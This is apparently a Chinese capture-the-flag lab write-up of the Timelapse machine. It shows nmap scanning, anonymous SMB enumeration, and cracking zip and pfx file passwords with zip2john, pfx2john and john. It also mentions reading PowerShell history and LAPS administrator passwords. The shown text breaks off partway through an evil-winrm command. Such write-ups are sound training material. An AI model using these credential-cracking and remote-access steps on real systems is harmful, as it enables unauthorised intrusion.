OSCP靶场50——Timelapse
文章描述了攻击链的信息收集过程:通过nmap扫描目标IP的开放端口后,使用smbclient连接SMB端口枚举共享目录并下载zip文件。随后利用zip2john提取压缩文件的哈希值进行爆破获得密码supremelegacy,并解压得到pfx文件。继续使用pfx2john提取pfx文件的哈希值再次爆破后获得file.key和file.crt证书。最后通过evil-winrm工具连接目标系统读取Windows历史命令,并在LAPS组中获取管理员密码。 2025-9-24 08:39:49 Author: www.freebuf.com(查看原文) 阅读量:26 收藏

freeBuf

主站

分类

云安全 AI安全 开发安全 终端安全 数据安全 Web安全 基础安全 企业安全 关基安全 移动安全 系统安全 其他安全

特色

热点 工具 漏洞 人物志 活动 安全招聘 攻防演练 政策法规

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

攻击链

信息收集,下载zip文件提取hash值爆破---获得pfx文件提取hash值爆破---利用pfx文件获得key和crt证书---

evil-winrm连接,读取windows历史命令,水平移动---利用LAPS权限读取管理员密码

知识点

zip2john提取压缩文件的hash值爆破

pfx2john提取pfx文件的hash值爆破

evil-winrm5986,SSL加密连接

读取Windows的历史命令

在LAPS组可以读取管理员的密码

过程

信息收集

ports=$(nmap -p- --min-rate=1000  -T4 10.129.114.80 | grep ^[0-9] | cut -d

'/' -f 1 | tr '\n' ',' | sed s/,$//)

nmap -A  -p$ports 10.129.114.80  > n1.txt

1758611241_68d247295d361395e1349.png!small?1758611243686

一般这个时候,我会把所有端口挨个尝试一遍。但似乎应该有所侧重才行。

连接SMB端口,枚举一下,找能用的目录:

smbclient  -L  \\\\10.129.114.80   -N

1758630218_68d2914aef72e00c872e2.png!small?1758630219282

所以有个zip可下载,但不知有啥用。

1758630285_68d2918d4a2cb33fcf327.png!small?1758630285764

需要密码。

zip2john winrm_backup.zip > hash.txt

john --format=zip  --wordlist=rockyou.txt    hash.txt

爆破出密码为 supremelegacy

1758630945_68d29421cbb4db9a5be34.png!small?1758630948561

解压出来是个pfx文件。打开这个文件也需要解压。

1758631520_68d29660ed792d17069c6.png!small?1758631521579

继续爆破,这里要提取pfx文件的hash值,再次爆破

pfx2john  legacyy_dev_auth.pfx > file.hash

john file.hash --wordlist=/usr/share/wordlists/rockyou.txt --force

1758633802_68d29f4ad11323c20163a.png!small?1758633803199

参考链接:

https://www.linkedin.com/posts/kjohnson422_capturetheflag-oscp-htb-activity-7110979686423240704-T9tZ

突破边界

所以按照参考链接操作

1758634133_68d2a0950bccd3d01075f.png!small?1758634133949

获得 file.key    file.crt

连接:

evil-winrm -i 10.129.

已在FreeBuf发表 0 篇文章

本文为 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)


文章来源: https://www.freebuf.com/articles/system/450143.html
如有侵权请联系:admin#unsafe.sh